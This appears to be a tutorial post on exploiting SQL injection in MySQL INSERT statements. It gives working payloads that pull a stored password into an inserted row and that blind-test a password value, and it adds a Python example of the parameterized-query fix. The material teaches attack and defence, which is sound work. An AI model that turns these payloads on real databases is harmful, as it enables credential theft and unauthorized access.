Exploiting SQL injection in an INSERT statement is not trivial, as most of the time you do not directly see the output of the injected query.
Unlike MS-SQL, MySQL 'generally' does not support the use of multiple queries, which is a common trick for exploiting SQL injection when the backend database is MS-SQL.
----------------------------------------------------
Example 1
Let's consider a vulnerable example, the injection point being $id (an integer field) in the following statement:
insert into secret values($id, 'Welcome');
----------------------------------------------------------------
Exploit
insert into secret values(1000, (select passwd from users where id=1))#, 'Welcome');
'#' comments out the rest of the query.
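
The fix for Example 1, as an added example that is not part of the original post: the concatenated statement beside a bound-parameter insert with an integer check. Python's sqlite3 stands in for MySQL so it runs offline; the table layout, the sample row and the function names are assumptions.

```python
import sqlite3

# Injected $id value from Example 1 on this page.
PAYLOAD = "1000, (select passwd from users where id=1))#"

def make_db():
    # Constructed sample schema and data (assumed; sqlite3 stands in for MySQL).
    db = sqlite3.connect(":memory:")
    db.executescript("""
        create table users(id integer, passwd text);
        create table secret(id integer, msg text);
        insert into users values(1, 'mypass');
    """)
    return db

def concatenated_sql(user_id):
    """Vulnerable pattern: $id is pasted into the statement text."""
    return "insert into secret values(" + user_id + ", 'Welcome');"

def insert_bound(db, user_id):
    """Bound parameters: the value travels as data and is never parsed as SQL."""
    db.execute("insert into secret values(?, ?)", (user_id, "Welcome"))

def insert_validated(db, user_id):
    """Hardened form: enforce the integer type first, then bind."""
    if not (user_id.isascii() and user_id.isdigit()):
        raise ValueError("id must be an integer")
    insert_bound(db, int(user_id))

def stored_rows(db):
    return db.execute("select id, msg from secret").fetchall()

if __name__ == "__main__":
    db = make_db()
    print(concatenated_sql(PAYLOAD))   # the statement shown under "Exploit"
    insert_bound(db, PAYLOAD)          # stored as literal text, subquery never runs
    try:
        insert_validated(db, PAYLOAD)  # rejected before reaching the database
    except ValueError as err:
        print("rejected:", err)
    insert_validated(db, "1000")
    print(stored_rows(db))
```

SQLite's flexible typing stores the bound payload as text in the integer column; MySQL would coerce or reject it depending on the SQL mode, which is why the type check comes before the bind.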
------------------------------------------------------------------
Example 2: Blind Injection
Scenario: the injection is in the last column of the query and is an integer field, hence an attacker cannot directly select a password into an integer field.
Query:- insert into secret values('WELCOME', $id);
EXPLOIT:-
insert into secret values('WELCOME', (select if (passwd ='mypass',1,0) from users where id=1))#);
--------------------------------------------------------------------------
If 'magic_quotes' is enabled, then one can use functions like ascii() and substr() to exploit it.
Question: Can you exploit the above (Example 2) if $id happens to be a string field? Let us know how! :)